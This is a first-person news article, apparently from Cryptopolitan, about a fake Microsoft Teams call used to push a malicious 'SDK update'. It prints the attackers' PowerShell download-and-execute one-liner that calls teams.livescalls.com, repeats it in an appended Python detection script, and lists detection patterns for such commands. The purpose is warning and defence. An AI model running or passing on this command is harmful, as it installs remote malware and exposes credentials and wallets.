Cryptopolitan
2026-03-01 09:48:38

I Almost Got Hacked on a Microsoft Teams Call — Here’s How the Scam Works

Let me tell you how I came within steps of becoming a victim in an elaborate social engineering scheme designed to exploit something as routine and apparently harmless as a Microsoft Teams call earlier today. For most of the interaction, nothing seemed out of the ordinary. Someone who I thought was an industry contact reached out to me to set up a meeting on Microsoft Teams, and the willing collaborator in me was only too happy to jump on the call. Spoiler alert: the person on the other end was an impersonator, and they tried to get me to run malicious code on my computer. I’m recounting the entire experience here as a heads-up for friends, acquaintances and contemporaries in the crypto and Web3 community. It was almost me today; it could actually be someone else tomorrow.

Step 1: The Setup — “Let’s Catch-Up Call, Old Friend”

When you receive a text from the Telegram account of someone you know as a top employee of a well-known crypto PR agency, the last thing on your mind is that you’re getting sucked into a phishing setup. None of the typical red flags were immediately apparent either. This was no random DM. I wasn’t talking to an impersonator account where the “i” is subtly replaced with an “l.” I actually had a chat history with the account too, so I thought I had the real person on the other end. Nothing seemed out of place from the moment they started a completely friendly conversation to reconnect. Before long, there was a Calendly link to book a 30-minute meeting and an invitation to a Microsoft Teams call. As I said earlier, my radar never went off once throughout the interaction. I sensed the same level of professionalism and patience as one would expect from a high-ranking staff member of a top PR agency. All I knew was I had scheduled a Teams meeting from the Calendly page of an industry contact.

Screenshot: The scammer initiates contact using a hacked account, sending a Teams meeting link.
Step 2: The “Join on Desktop Only” Trap

The day of the meeting came, and I clicked the Teams meeting link on my phone as I’ve done at least a thousand times in the past. However, it did not take me straight into the meeting as usual. Instead of being redirected into the call, a screen loaded claiming “Access to this meeting via mobile devices is not permitted due to organizer settings.” “Uh-oh! This has never happened to me before.” Well, it was no accident either. In hindsight, that was probably the first real red flag.

The error screen is part of the design. The scammers need you on a desktop or laptop because their payload is a PowerShell one-liner: it needs a Windows machine with a terminal, and a phone cannot run it. The URL in the browser, “teams.livescalls.com”, is NOT a Microsoft domain. Legitimate Teams meeting join pages live on teams.microsoft.com or teams.live.com. From afar, “livescalls.com” looks close enough to the real thing, but it is far from it if you look closely: the registered domain is livescalls.com, and “teams” is just a subdomain the attackers chose to put in front of it. One is the Microsoft-controlled site that claims over 320 million monthly active users. The other is a completely fake site controlled by the attackers. To be fair, an organization might send you a link on its own domain, but that link should redirect to a Microsoft-hosted join page; if the page you actually join from is not on a Microsoft domain, stop. And with over $1 trillion in funds lost to scammers in 2025, according to the World Economic Forum, I had reason enough not to ignore my spidey senses.

Screenshot: The fake “Team Access Notice” page blocks mobile access, forcing victims to use a desktop where the malicious script can run. Note the URL: teams.livescalls.com, not a Microsoft domain.

Screenshot: The scammer pressures the victim to join on desktop after the mobile block, claiming “partners are waiting.”

Step 3: The Payload — “Update Your TeamsFx SDK”

Once on desktop, the fake Teams meeting displayed a professionally designed page that looks like something you would see in official Microsoft documentation. It even included real Microsoft language about the TeamsFx SDK being deprecated by September 2025. The solution? Copy a code block and run it in your terminal or Command Prompt. If you took the extra step of a Google search, you’d find that an SDK by that name does exist. You just don’t need it to join a Teams call; no meeting requires a participant to install a developer SDK.

The code looks harmless at first: it sets environment variables with official-sounding names like TeamsFx_API_KEY and MS_Teams_API_SECRET. Those lines are window dressing. The real attack is sandwiched somewhere in the middle, and the attackers are counting on you not reading that far:

powershell -ep bypass -c "(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex"

This single line does three things. -ep bypass (short for -ExecutionPolicy Bypass) turns off PowerShell’s script execution policy for this process; that policy is a guardrail rather than a security boundary, and legitimate admin scripts use the same flag, which is exactly why it is so easy to wave away. iwr (Invoke-WebRequest) downloads text from the attacker’s server; the custom -UserAgent 'teamsdk' most likely lets that server hand the payload only to the script and serve something innocuous to anyone who opens the URL in a browser to check it. Finally, .Content | iex pipes the downloaded text into Invoke-Expression, which runs it immediately in memory, so this first stage never touches the disk where a file scan would see it. And just like that, whatever malware, keylogger, or remote access tool the attackers have hosted is silently installed on your device.

Screenshot: The fake Teams meeting interface showing the malicious “TeamsFx SDK update” page being presented to participants. Note the participants in the call: AI-generated videos.

Step 4: The “Don’t Worry, It’s Safe” Pressure Stage

When I expressed hesitation about running the script, the imposter immediately delivered a reassurance-and-pressure combo. The “Don’t worry, it is very simple and safe for you,” line was supposed to ease me into following the instructions in the screenshot showing me how to open Command Prompt on my PC. “Partners have already joined in Zoom,” was supposed to make me feel the pressure of not wanting to make everyone switch platforms because I couldn’t figure out how to run a simple Command Prompt command. I wasn’t reassured. I wasn’t pressured, either. When I suggested moving the call to Google Meet, they refused. Apparently, their scam only works through their fake Teams setup.
Screenshot: The scammer sends step-by-step instructions to run the malicious code, reassuring the victim: “Don’t worry, it is very simple and safe for you.”

Step 5: Bluff Called — Blocked and Deleted

I confirmed my suspicions after checking the script and the domain: I was being socially engineered and was within a few steps of becoming part of the World Economic Forum’s 2026 stats. I told the scammer directly: “I just checked and this command and the website there aren’t legit. Unfortunately I won’t be able to do it.” I offered to continue the conversation on Google Meet if they still wanted to chat. “But meeting is running now,” was the message from the other end. As expected, their response was meant to make me feel the urgency of joining the call. After all, I wouldn’t want to keep all those partners waiting for too long. Moments later, they deleted our entire correspondence and blocked me. Ah… That’s not just a red flag. Talk about shades of crimson. Business contacts don’t delete their entire conversation history and block you the moment you question a software update.

Screenshot: After the scam is called out, the attacker insists the meeting is “running now” before deleting all messages and blocking the victim.

How to Protect Yourself

This type of attack is surging across the crypto, Web3, and tech industries. Scammers are compromising or impersonating real accounts belonging to PR professionals, investors, and project leads to target high-value individuals. Here’s how to stay safe:

Never run commands from a meeting page. No legitimate video call platform will ever ask you to paste code into your terminal or Command Prompt. Joining a call needs, at most, the vendor’s own client or your browser.

Check the URL. Real Microsoft Teams meetings live on teams.microsoft.com or teams.live.com, not “teams.livescalls.com” or any other lookalike domain. Read the hostname from the right: the part just before the public suffix (here, livescalls.com) is what the attacker registered, and everything to its left is theirs to choose.

Be suspicious of “desktop only” requirements. If a meeting blocks mobile access, that’s a deliberate tactic to get you on a machine where scripts can be executed.

Verify the person through a separate channel. If a known contact sends you an unusual meeting link, call them directly or message them on a different platform to confirm. A compromised account comes with the real chat history, so history alone proves nothing.

Watch for “powershell -ep bypass” and “iex”. These are the two biggest red flags in any script you are asked to paste. The first turns off PowerShell’s script execution policy for that process; the second, Invoke-Expression, runs whatever text it is handed, including text just downloaded from the internet. Expect variants: -ExecutionPolicy Bypass spelled out, Invoke-Expression spelled out, an -EncodedCommand (or -enc) followed by a base64 blob that hides the real command, or, on macOS and Linux, curl … | sh. You do not need to decode any of it; being told to paste a command at all is the tell.

If you already ran the script:
Disconnect from the internet immediately (unplug the cable or turn off Wi-Fi) so any remote access tool loses its connection.
Run a full malware scan (Malwarebytes, Windows Defender Offline). Bear in mind that a freshly served payload may not be detected yet; the safe assumption is that the machine is compromised, and the reliable fix is to wipe and reinstall it rather than trust a clean scan.
Change all passwords from a different, clean device, and sign out of all sessions (browser, email, Telegram, exchanges) so that stolen session cookies stop working.
Treat every secret that was on the machine as stolen: any wallet whose seed phrase or private key was stored, typed or pasted there should be emptied into a new wallet generated on a clean device. Monitor crypto wallets and bank accounts for unauthorized transactions.

Why This Matters for Crypto and Web3

I wouldn’t call this a typical phishing interaction, where attackers cast wide nets and see what they drag in. No, this was a targeted, multi-day social engineering operation. The attackers cosplayed as industry contemporaries for days, building rapport and setting up to casually guide the target through “fixing” a technical issue on a Teams call via a convincing fake Microsoft page. Whether they steal your credentials, drain your crypto wallet, or install persistent remote access malware, the attackers have everything to gain and nothing to lose. If you’re a founder, investor, or anyone who takes meetings in the crypto and tech space, share this article with your team. The people running these scams are getting better, and the only defense is awareness.
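As an added example (not code from the original post, and not anything Microsoft or Cryptopolitan publish), here are the "check the URL" and "watch for -ep bypass and iex" advice above, and the breakdown of the one-liner in Step 3, written as a small Python script you could run over a meeting link or over a block a page asks you to paste. It goes slightly beyond the post: it also catches the -EncodedCommand and curl | sh variants. The allowlist of Teams hosts and the signal patterns are this example's own assumptions, and the "SDK update" block embedded at the bottom is constructed for the demonstration (only the URL in it is the one the post shows).

```python
# Added example, not code from the original post: the "check the URL" and
# "watch for -ep bypass / iex" checks as runnable heuristics. The host
# allowlist and the regexes below are this example's own assumptions.
import re
from urllib.parse import urlsplit

# Hosts that serve real Microsoft Teams meeting join pages (assumption: a
# short illustrative allowlist; extend it if your tenant lives elsewhere).
TEAMS_HOSTS = ("teams.microsoft.com", "teams.live.com")


def is_real_teams_link(url: str) -> bool:
    """True only when the URL's host is an allowlisted Teams host or a
    subdomain of one. Comparing whole host labels, not substrings, is the
    point: 'teams.livescalls.com' begins with 'teams.live' yet is not under
    teams.live.com, so it must fail this check."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in TEAMS_HOSTS)


# Independent signals; a download-and-execute one-liner combines several.
# Keeping them separate lets the verdict say *why* a command was flagged.
SIGNALS = {
    # -ep / -ex / -exec / -ExecutionPolicy followed by Bypass
    "execution_policy_bypass": re.compile(r"-e[px]\w*\s+bypass", re.I),
    # anything that pulls text from the network
    "remote_fetch": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b",
        re.I,
    ),
    # the PowerShell sink: text becomes code
    "invoke_expression": re.compile(r"(?:\biex\b|invoke-expression)", re.I),
    # the Unix equivalent of '| iex'
    "pipe_to_shell": re.compile(r"\|\s*(?:sh|bash|zsh)\b", re.I),
    # -e / -ec / -enc / -EncodedCommand with a base64 blob: the real command
    # is hidden from a casual read, which is itself grounds to refuse it
    "encoded_command": re.compile(
        r"-e(?:ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{20,}", re.I
    ),
}

URL_RX = re.compile(r"""https?://[^\s'"()]+""", re.I)


def analyze_command(cmd: str) -> dict:
    """Classify a command a web page asked the user to paste into a terminal.

    'suspicious' is True when fetched (or base64-hidden) text is handed to an
    evaluator, no matter how many harmless lines surround that one line.
    An execution-policy bypass on its own is NOT enough: legitimate admin
    scripts use it too, so it is reported as a signal but not a verdict."""
    hits = [name for name, rx in SIGNALS.items() if rx.search(cmd)]
    urls = URL_RX.findall(cmd)
    source = "remote_fetch" in hits or "encoded_command" in hits
    sink = "invoke_expression" in hits or "pipe_to_shell" in hits
    return {
        "suspicious": (source and sink) or "encoded_command" in hits,
        "signals": hits,
        "urls": urls,
        # Reported separately so the reader sees both problems at once:
        # the technique and the lookalike domain it fetches from.
        "non_teams_urls": [u for u in urls if not is_real_teams_link(u)],
    }


# Constructed sample (not captured from the attackers' server): the kind of
# "SDK update" block the post describes, with the one-liner buried between
# decoy environment-variable lines. Only the URL is the one the post shows.
FAKE_SDK_UPDATE_BLOCK = """\
set TeamsFx_API_KEY=example-key
set MS_Teams_API_SECRET=example-secret
powershell -ep bypass -c "(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex"
set TeamsFx_REGION=example-region
"""

if __name__ == "__main__":
    for link in ("https://teams.microsoft.com/l/meetup-join/19%3ameeting_abc",
                 "https://teams.livescalls.com/meet/abc"):
        verdict = "Microsoft host" if is_real_teams_link(link) else "NOT a Microsoft host"
        print(f"{link} -> {verdict}")
    print(analyze_command(FAKE_SDK_UPDATE_BLOCK))
```

Run as a script, it prints the verdict on the post's lookalike link and on the constructed block; the dict returned by analyze_command names each signal, so a reader learns which part of the one-liner tripped the check rather than just "bad". The design choice worth noting is that an execution-policy bypass alone does not decide the verdict: the same flag shows up in ordinary deployment scripts, and treating it as conclusive would train people to ignore the warning. What makes the post's command malicious is the pairing of a network fetch with Invoke-Expression, and that pairing is what the heuristic keys on.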
